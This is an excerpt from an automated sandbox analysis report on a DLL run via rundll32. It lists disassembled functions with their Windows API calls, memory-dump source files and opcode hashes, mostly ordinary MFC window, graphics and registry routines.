                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString$H_prolog3_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 842698744-0
                                                                                                                                                            • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                                            • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                                                            • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                                            • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                                              • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                                              • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                                              • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                                                            • SendMessageA.USER32 ref: 10016A5B
                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1877664794-0
                                                                                                                                                            • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                                            • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                                                            • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                                            • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                                                            • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                                                            • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                                            • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                                            • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                                            • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 670545878-0
                                                                                                                                                            • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                                            • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                                                            • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                                            • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                                                            • GetWindowRect.USER32 ref: 1002059C
                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1315500227-0
                                                                                                                                                            • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                                            • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                                                            • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                                            • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _memset
                                                                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                                            • API String ID: 2102423945-4122032997
                                                                                                                                                            • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                                            • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                                                            • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                                            • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                                            • String ID: System
                                                                                                                                                            • API String ID: 1529587224-3470857405
                                                                                                                                                            • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                                                            • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                                                            • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                                                            • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                                                            • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                                                            • API String ID: 2418878492-2500072749
                                                                                                                                                            • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                                                            • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                                                            • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                                                            • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                                                            • _memset.LIBCMT ref: 1001579D
                                                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                                                            • LoadBitmapA.USER32 ref: 10015807
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4271682439-3916222277
                                                                                                                                                            • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                                            • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                                                            • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                                            • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                                                            • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2429671754-3916222277
                                                                                                                                                            • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                                            • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                                                            • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                                            • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: System$Metrics$InfoParameters
                                                                                                                                                            • String ID: B$DISPLAY
                                                                                                                                                            • API String ID: 3136151823-3316187204
                                                                                                                                                            • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                                            • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                                                            • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                                            • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Edit
                                                                                                                                                            • API String ID: 0-554135844
                                                                                                                                                            • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                                            • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                                                            • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                                            • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                                                            • SendMessageA.USER32 ref: 10023CD9
                                                                                                                                                            • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                                                            • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 187318432-0
                                                                                                                                                            • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                                            • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                                                            • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                                            • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                                                              • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 69039007-0
                                                                                                                                                            • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                                            • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                                                            • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                                            • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                                                              • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                                                              • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B420
